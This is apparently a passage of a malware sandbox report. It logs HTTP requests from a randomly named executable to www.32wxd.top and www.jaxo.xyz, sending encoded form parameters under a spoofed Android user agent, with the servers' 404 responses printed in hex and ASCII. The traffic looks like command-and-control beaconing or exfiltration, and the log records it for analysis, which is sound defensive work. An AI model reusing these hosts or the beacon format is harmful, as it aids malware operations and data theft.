73 59 38 59 7a 51 45 77 6b 74 37 33 5a 67 67 74 73 76 50 6f 50 62 2b 42 4c 62 56 57 52 33 4e 36 49 61 56 41 33 6c 67 49 79 4d 77 42 2f 78 67 47 4b 35 57 35 36 65 4a 62 37 43 59 37 76 62 52 6a 6c 63 69 36 4f 2b 75 4b 45 57 61 4e 61 65 4f 44 69 7a 51 62 53 68 [TRUNCATED]
                  Data Ascii: 56gD=aBuNv8bUDAAzGcugMR3u1R/CSiJS0HZj7bsQ1BuXBCENrOq3XOEN4nG2IEZoXx+Z87kq0UFLZJ9Mwthk4LovF5aW/XJrhtniAxsj0bIE0ReH2SmuCGgoUsazHN1gh9vxNSdt8Mg+vE1ZO1x78fJCZxDDWoE1D5ZzGxrVKmDbHs/iuTV4DSxjfNMfq8UeUU8BLp+LTDiGsXdDejXVWwVPq1IoRNdLdpgZlxoh/bo9oEh7il4xSc4VByCsY8YzQEwkt73ZggtsvPoPb+BLbVWR3N6IaVA3lgIyMwB/xgGK5W56eJb7CY7vbRjlci6O+uKEWaNaeODizQbShDOCDubglgRrvSwEstlNwIrNRbC0cLNd64biJcUli/MGMxnB/m/9zvvfCnBt1JCLZLJiBiuUlm0SyeT9g3RzGPP0XlOSewKAyqoAMSgMSTAEGc+e3evdFN3nFzwNhttV21Dw1loHj7Ari1LZL5QUzej9V9tk9rEismE+1CBDKxiOdJWmwEUXqNxwKvoi5OEjTnWNxdIoAceb3d3M5c3Xvgy/4ML26rLCqFYWpVlDYTmDrGP+vzMnv4BtRQ9TWLmXLOFbT52QVbGytoXTpfLSx9aLjAP7eyLgKvQnRpMMaw1VYErUApqFVfyv8MSKD3qGsNEqKaUEJgoVHPoEAvyZKH4kv5ktjBKrBimecJoC4suV1sABxQUOK2zO7Fs1Hj4OaEimmtmY0Nqxk2M6mEfiprsm/NuewmYtxP4wNXqohIX6KFmOweJ5JDii0//l8lf9X7WqkJMkszu0hmHqZx14af7yKS0+I6cj79MBkODD+09mVqfPkClyrztKCILEDfxN7Sk3Z4UIl5PWcP2R922lhgwsrsqMsXmDUGP0sJTkAJdoUu/wBuCGNzRGqV1OZSBonwKVgS1Q3nGN7YxPV6AvI3/G/78oKoOrUuZubSS2gQ6R2428B3PscYugREvV+hugjMeGiZy5a3QxVgNBMyvaY3099OqCrK/eG1h [TRUNCATED]
                  Sep 4, 2024 09:36:48.694749117 CEST691INHTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:36:48 GMT
                  Content-Type: text/html
                  Content-Length: 548
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.449753206.119.82.116805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:36:50.351444960 CEST478OUTGET /kyiu/?56gD=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.32wxd.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:36:51.255268097 CEST691INHTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:36:51 GMT
                  Content-Type: text/html
                  Content-Length: 548
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.44975466.29.149.180805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:36:56.317368984 CEST733OUTPOST /f9bc/ HTTP/1.1
                  Host: www.jaxo.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.jaxo.xyz
                  Referer: http://www.jaxo.xyz/f9bc/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 51 4b 51 57 34 33 4a 50 6a 74 63 65 6b 54 6c 65 6a 61 56 32 31 61 5a 38 68 46 7a 6f 33 41 73 74 6e 53 76 43 6f 43 32 41 72 79 65 55 45 77 78 70 2f 50 55 75 63 54 45 6c 4e 68 57 62 65 69 77 6c 31 2f 6f 56 79 4c 64 32 4a 35 2b 6e 7a 77 39 36 64 70 50 6e 47 64 76 58 54 36 35 42 51 30 6d 50 50 33 65 38 44 63 79 4b 70 6a 6f 32 44 46 37 79 52 4b 2b 56 48 46 4c 70 41 37 34 61 6d 66 67 59 35 50 34 38 78 42 7a 50 62 63 7a 49 4c 34 58 63 43 7a 74 56 72 46 67 46 64 48 33 57 53 48 46 4c 6d 66 5a 69 65 46 71 6e 59 77 69 67 30 51 58 37 37 69 70 54 7a 77 3d 3d
                  Data Ascii: 56gD=3QjmXr4dAreEQKQW43JPjtcekTlejaV21aZ8hFzo3AstnSvCoC2AryeUEwxp/PUucTElNhWbeiwl1/oVyLd2J5+nzw96dpPnGdvXT65BQ0mPP3e8DcyKpjo2DF7yRK+VHFLpA74amfgY5P48xBzPbczIL4XcCztVrFgFdH3WSHFLmfZieFqnYwig0QX77ipTzw==
                  Sep 4, 2024 09:36:56.901293993 CEST1236INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:36:56 GMT
                  Server: Apache
                  Content-Length: 13840
                  Connection: close
                  Content-Type: text/html
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                  Sep 4, 2024 09:36:56.901365995 CEST224INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                  Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: cente
                  Sep 4, 2024 09:36:56.901376963 CEST1236INData Raw: 72 3b 0a 7d 0a 0a 2e 70 61 74 68 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 33 30 30 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 33 30 30 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 64 61 73 68
                  Data Ascii: r;}.path { stroke-dasharray: 300; stroke-dashoffset: 300; animation: dash 4s alternate infinite;}@keyframes dash{ 0%, 30%{ fill: 4B4B62; stroke-dashoffset: 0; } 80%,100%{ fill: transparent; stroke-dash
                  Sep 4, 2024 09:36:56.901386976 CEST1236INData Raw: 36 2e 37 31 35 2d 32 37 2e 36 38 33 2d 31 30 2e 36 34 35 2d 35 37 2e 38 34 34 20 31 38 2e 33 37 37 2d 38 36 2e 31 35 32 20 39 2e 38 37 33 2d 32 2e 31 30 31 2d 2e 36 33 2d 34 2e 33 31 32 2d 31 2e 36 30 35 2d 35 2e 34 31 38 2d 33 2e 36 34 31 2d 31
                  Data Ascii: 6.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-1.605-5.418-3.641-1.08-1.988-.834-4.51-.214-6.716 3.468-12.348 16.939-20.21 17.528-33.102.32-7.008-3.504-13.564-8.325-18.251-33.126-32.2-81.125 6.102-114.9 18.194-55.542 19.884-112
                  Sep 4, 2024 09:36:56.901397943 CEST1236INData Raw: 22 4d 33 34 2e 36 34 38 20 31 36 37 2e 37 35 38 63 2d 38 2e 38 36 33 2d 31 2e 35 32 36 2d 32 33 2e 35 31 35 2d 36 2e 39 33 39 2d 33 30 2e 32 39 32 2d 31 34 2e 32 31 38 2d 36 2e 37 37 35 2d 37 2e 32 38 2d 32 2e 30 39 36 2d 38 2e 38 30 33 20 33 2e
                  Data Ascii: "M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.557 54.124 12.263 29.555.706 61.424-6.946 72.2-17.053 0 0 2.705-1.47 2.768 1.509.062 2.98.428 7.948-2.769 10.507-3.196 2.558-34.8
                  Sep 4, 2024 09:36:56.901411057 CEST672INData Raw: 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 45 41 44 34 22 20 64 3d 22 4d 34 35 2e 35 30 38 20 31 33 2e 31 31 34 63 2d 2e 33 36 38 2e 35 34 39 2d 2e 35 34 20 31
                  Data Ascii: (161 68)"/> <path fill="#FFEAD4" d="M45.508 13.114c-.368.549-.54 1.598-.503 2.445.017.392.297.604.45.287.143-.297.222-.617.303-.978.087-.387.197-.735.238-1.15.042-.44-.257-.95-.488-.604M42.092 9.016c-.694.13-1.446.61-1.774 1.09
                  Sep 4, 2024 09:36:56.901532888 CEST1236INData Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                  Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                  Sep 4, 2024 09:36:56.901549101 CEST1236INData Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                  Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.508.364.327.219
                  Sep 4, 2024 09:36:56.901561022 CEST448INData Raw: 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e 31 38 32 2d 2e 30 33 2d 2e 32 35 35 4d 35 32 2e 39 30 36 20 38 2e 32 39 31 63 2d 2e 31 39 31 2d 2e 32 34 2d 2e 34 30 32 2d 2e 32 30 34 2d 2e 36
                  Data Ascii: 021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.033.724-.356.388.
                  Sep 4, 2024 09:36:56.901573896 CEST1236INData Raw: 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e 35 31 32 20 31 2e 31 37 2e 31 31 2e 31 34 34
                  Data Ascii: -.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.35.253 1.516-.1
                  Sep 4, 2024 09:36:56.906225920 CEST1236INData Raw: 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34 36 36 2d 31 2e 33 30 36 4d 31 30 38 2e 34 35
                  Data Ascii: 11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.478-.064-1.305-.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.44975566.29.149.180805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:36:58.855741978 CEST753OUTPOST /f9bc/ HTTP/1.1
                  Host: www.jaxo.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.jaxo.xyz
                  Referer: http://www.jaxo.xyz/f9bc/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 57 62 67 57 37 52 42 50 79 64 63 5a 68 54 6c 65 70 36 56 79 31 61 56 38 68 41 44 34 77 79 49 74 69 48 54 43 36 58 57 41 6f 79 65 55 51 41 77 6a 77 76 56 69 63 54 34 63 4e 6b 75 62 65 6a 51 6c 31 37 73 56 7a 38 78 35 4a 70 2b 66 37 51 39 43 54 4a 50 6e 47 64 76 58 54 35 46 72 51 30 65 50 50 44 69 38 41 2b 57 4c 71 6a 6f 31 41 46 37 79 56 4b 2b 5a 48 46 4c 41 41 34 39 33 6d 64 59 59 35 4b 45 38 78 55 47 5a 56 63 7a 4f 50 34 57 76 53 53 63 4e 68 56 52 75 62 6b 71 7a 56 55 68 66 75 35 49 34 50 30 4c 77 4b 77 47 54 70 58 65 50 32 68 55 61 6f 77 47 61 67 75 73 56 4d 74 65 49 51 64 52 49 76 70 6c 77 34 76 67 3d
                  Data Ascii: 56gD=3QjmXr4dAreEWbgW7RBPydcZhTlep6Vy1aV8hAD4wyItiHTC6XWAoyeUQAwjwvVicT4cNkubejQl17sVz8x5Jp+f7Q9CTJPnGdvXT5FrQ0ePPDi8A+WLqjo1AF7yVK+ZHFLAA493mdYY5KE8xUGZVczOP4WvSScNhVRubkqzVUhfu5I4P0LwKwGTpXeP2hUaowGagusVMteIQdRIvplw4vg=
                  Sep 4, 2024 09:36:59.591449022 CEST1236INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:36:59 GMT
                  Server: Apache
                  Content-Length: 13840
                  Connection: close
                  Content-Type: text/html
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                  Sep 4, 2024 09:36:59.591536999 CEST224INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                  Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: cente
                  Sep 4, 2024 09:36:59.591553926 CEST1236INData Raw: 72 3b 0a 7d 0a 0a 2e 70 61 74 68 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 33 30 30 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 33 30 30 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 64 61 73 68
                  Data Ascii: r;}.path { stroke-dasharray: 300; stroke-dashoffset: 300; animation: dash 4s alternate infinite;}@keyframes dash{ 0%, 30%{ fill: 4B4B62; stroke-dashoffset: 0; } 80%,100%{ fill: transparent; stroke-dash
                  Sep 4, 2024 09:36:59.591564894 CEST1236INData Raw: 36 2e 37 31 35 2d 32 37 2e 36 38 33 2d 31 30 2e 36 34 35 2d 35 37 2e 38 34 34 20 31 38 2e 33 37 37 2d 38 36 2e 31 35 32 20 39 2e 38 37 33 2d 32 2e 31 30 31 2d 2e 36 33 2d 34 2e 33 31 32 2d 31 2e 36 30 35 2d 35 2e 34 31 38 2d 33 2e 36 34 31 2d 31
                  Data Ascii: 6.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-1.605-5.418-3.641-1.08-1.988-.834-4.51-.214-6.716 3.468-12.348 16.939-20.21 17.528-33.102.32-7.008-3.504-13.564-8.325-18.251-33.126-32.2-81.125 6.102-114.9 18.194-55.542 19.884-112
                  Sep 4, 2024 09:36:59.591576099 CEST1236INData Raw: 22 4d 33 34 2e 36 34 38 20 31 36 37 2e 37 35 38 63 2d 38 2e 38 36 33 2d 31 2e 35 32 36 2d 32 33 2e 35 31 35 2d 36 2e 39 33 39 2d 33 30 2e 32 39 32 2d 31 34 2e 32 31 38 2d 36 2e 37 37 35 2d 37 2e 32 38 2d 32 2e 30 39 36 2d 38 2e 38 30 33 20 33 2e
                  Data Ascii: "M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.557 54.124 12.263 29.555.706 61.424-6.946 72.2-17.053 0 0 2.705-1.47 2.768 1.509.062 2.98.428 7.948-2.769 10.507-3.196 2.558-34.8
                  Sep 4, 2024 09:36:59.591593027 CEST672INData Raw: 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 45 41 44 34 22 20 64 3d 22 4d 34 35 2e 35 30 38 20 31 33 2e 31 31 34 63 2d 2e 33 36 38 2e 35 34 39 2d 2e 35 34 20 31
                  Data Ascii: (161 68)"/> <path fill="#FFEAD4" d="M45.508 13.114c-.368.549-.54 1.598-.503 2.445.017.392.297.604.45.287.143-.297.222-.617.303-.978.087-.387.197-.735.238-1.15.042-.44-.257-.95-.488-.604M42.092 9.016c-.694.13-1.446.61-1.774 1.09
                  Sep 4, 2024 09:36:59.591605902 CEST1236INData Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                  Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
